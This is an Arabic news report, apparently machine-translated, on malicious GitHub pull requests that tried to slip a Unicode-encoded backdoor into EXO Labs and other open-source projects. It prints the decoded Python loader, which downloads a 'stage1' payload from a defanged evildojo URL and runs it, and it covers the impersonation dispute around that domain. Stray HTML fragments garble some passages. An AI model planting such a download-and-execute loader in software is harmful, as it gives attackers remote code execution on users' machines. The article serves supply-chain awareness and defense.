تم استهداف مشاريع GitHub بعمليات ارتكاب ضارة وطلبات سحب، في محاولة لإدخال أبواب خلفية في هذه المشاريع.
في الآونة الأخيرة، تم استهداف مستودع GitHub الخاص بـ Exo Labs، وهي شركة ناشئة تعمل في مجال الذكاء الاصطناعي والتعلم الآلي، في الهجوم، مما جعل الكثيرين يتساءلون عن النوايا الحقيقية للمهاجم.
تم القبض على “علاقات عامة تبدو بريئة” وهي تدخل الباب الخلفي
يوم الثلاثاء، حذر Alex Cheema، المؤسس المشارك لـ EXO Labs، الجميع من “innocent looking” تم إرسال تغيير الكود إلى مستودع GitHub الخاص بـ EXO.
طلب السحب بعنوان “clarify mlx requirement for deepseek models” حاولت تعديل”https://github.com/exo-explore/exo/blob/main/exo/models.py” الهدف=”_blank” rel=”nofollow noopener”>models.pyبايثون في قاعدة التعليمات البرمجية الخاصة بـ Exo عن طريق إضافة سلسلة من الأرقام إليه:
– أليكس شيما – e/acc (@alexocheema)”https://twitter.com/alexocheema/status/1856295635143524378?ref_src=twsrc%5Etfw” rel=”nofollow noopener”>12 نوفمبر 2024
هذه أرقام Unicode، يمثل كل منها حرفًا. بمعنى آخر، تم تحويل كود بايثون النصي العادي إلى شكله المكافئ للأرقام عبر تقنية بسيطة يستخدمها المستخدم الذي يرسل تغيير الكود.
هذا تسلسل الشخصيات “105, 109, 112, 111, 114, 116,…” يُترجم إلى مقتطف الشفرة التالي (تم تغيير عنوان URL لأغراض السلامة):
استيراد نظام التشغيل استيراد urllib استيراد urllib.request x=urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload") ص=x.read() ض=y.decode("utf8") x.Close() os.system(z)يحاول الجزء البسيط من التعليمات البرمجية الاتصال بموقع evildojo(.)com وتنزيله، كما يبدو “stage1” حمولة.
لو تمت الموافقة على تغيير الكود ودمجه في مستودع EXO الرسمي، وهو ما لم يحدث، يمكن لأي شخص يستخدم المنتج أن ينتهي به الأمر إلى تنفيذ التعليمات البرمجية التي يتم تقديمها عن بعد بواسطة عنوان URL على نظامهم – وبالتالي زرع باب خلفي وظيفي.
ومع ذلك، عند الوصول إليه بواسطة BleepingComputer، أعاد الرابط 404 (غير موجود)، ووفقًا للعديد من الآخرين الذين حاولوا الوصول إلى عنوان URL، لم يكن هناك أي محتوى على الإطلاق في الموقع منذ البداية.
ومن يقف وراء ذلك ولماذا؟
هذا هو المكان الذي يصبح فيه الأمر صعبًا ولا توجد إجابة قاطعة في الأفق.
يبدو أن الالتزام قد تم إرساله من مستخدم GitHub، “evildojo666,” الحساب الذي تم حذفه منذ ذلك الحين.
ال”http://archive.md/waYje” الهدف=”_blank” rel=”nofollow noopener”> الصفحة المؤرشفةبالنسبة لاسم مستخدم GitHub والمجال evildojo(.)com يشيران إلى مايك بيل، وهو باحث أمني مقيم في تكساس، ومتسلل أخلاقي، ومهندس برمجيات نفى باستمرار أن يكون له أي علاقة بهذه الالتزامات.
يدعي بيل أن شخصًا ما ينتحل شخصيته، ويقوم بتقديم هذه التعليمات البرمجية الخبيثة لتشويه سمعته.
لدى بيل المزيد”https://x.com/evildojo666/status/1857467782972969191″ الهدف=”_blank” rel=”nofollow noopener”> ذكر الذي – التي “there was never any payload…why do people keep assuming there was?”
بكل إنصاف، قصة بيل تضيف المزيد. يمكن لأي شخص إنشاء حساب GitHub بشكل تافه باستخدام تفاصيل شخص آخر وصورة الملف الشخصي، والبدء في إرسال تغييرات التعليمات البرمجية وسحب الطلبات إلى المشاريع – كل ذلك تحت ستار شخص آخر.
المعدومة “stage1payload” تعد الصفحة الموجودة على نطاق evildojo مؤشرًا آخر على أنه نظرًا لأن النطاق لم يقدم أبدًا أي تعليمات برمجية ضارة في المقام الأول، فمن المحتمل أن تكون هذه حملة تشهير ضد مالك النطاق، مايك بيل.
حساب GitHub آخر محذوف الآن “ darkimage666” كان”https://x.com/Malcoreio/status/1856334804184109142″ الهدف=”_blank” rel=”nofollow noopener”>تم تحديدها بواسطة Malcoreio، منصة لتحليل البرامج الضارة والهندسة العكسية. قام هذا الحساب أيضًا بانتحال شخصية بيل وبدا أنه يشارك في هذا الجهد الخبيث لتوزيع الالتزامات الخلفية للمشاريع مفتوحة المصدر.
“Not me, an impersonator. Notice account deleted. Very sorry people are being dragged into some skid’s beef w/ me,” لاحظالجرس في حساب الدجال.
مشاريع متعددة مستهدفة
مستخدمي وسائل التواصل الاجتماعي، بما في ذلك”https://x.com/chan__kong/status/1856660199177638052″ الهدف=”_blank” rel=”nofollow noopener”> كرزان كونغ، أشار إلى أن بعض المشاريع الأخرى قد تم استهدافها من قبل حسابات مستخدمين مختلفة على GitHub”https://github.com/search?q=%5B105%2C109%2C112%2C111%2C114%2C116%2C32%2C111%2C115%2C10&type=code” الهدف=”_blank” rel=”nofollow noopener”> ارتكابات مماثلة.
بحسب محلل إنتل التهديد vx-تحت الأرض,”yt-dlp“، كما تم استهداف برنامج تنزيل الصوت والفيديو الشهير مفتوح المصدر. وتم التعرف على Malcore”https://x.com/Malcoreio/status/1856334306609647748″ الهدف=”_blank” rel=”nofollow noopener”> على الأقل 18 حالةمن طلبات السحب المتطابقة الموجهة إلى مشاريع أخرى.
في وقت كتابة هذا التقرير، لاحظت BleepingComputer أن العديد من هذه الأخطاء الخبيثة وما يرتبط بها من جرائم “muppet” تمت إزالة حسابات مستخدمي GitHub، والتي يبدو أن بعضها مقره في إندونيسيا.
تمكن بوجدان ستانجا، مهندس Google ومسؤول الأحداث التقنية، من ذلك”https://x.com/bdstanga/status/1856430697352708149″ الهدف=”_blank” rel=”nofollow noopener”> إعادة إنشاء طلب السحبلاختبار الإرسال المسبق”https://github.com/presubmit/ai-reviewer” الهدف=”_blank” rel=”nofollow noopener”> مراجع الذكاء الاصطناعي، والذي يستخدم إجراءات GitHub لإجراء مراجعات فورية للتعليمات البرمجية مقابل طلبات السحب الواردة إلى المستودع الخاص بك. تم وضع علامة على تغيير رمز الاختبار على الفور بعلامة “critical security” تنبيه من المراجع:
(بيبينجكومبيوتر)
ورغم أن الحادثة تم اكتشافها وسحقها في وقت مبكر، إلا أنها تحمل أصداء بارزة”https://www.bleepingcomputer.com/news/security/red-hat-warns-of-backdoor-in-xz-tools-used-by-most-linux-distros/” الهدف=”_blank”> هجوم سلسلة التوريد xz والتي أظهرت مؤخرًا كيف يمكن تسلل التعليمات البرمجية الضارة إلى مكتبات مفتوحة المصدر مشروعة وذات شعبية كبيرة من قبل جهات فاعلة شريرة.
يتم حث القائمين على المشروع مفتوح المصدر على فحص طلبات السحب الواردة بعناية، من خلال الأدوات الآلية ومراجعات التعليمات البرمجية البشرية الشاملة، حتى لو بدا أنها صادرة عن “good faith” المساهمين.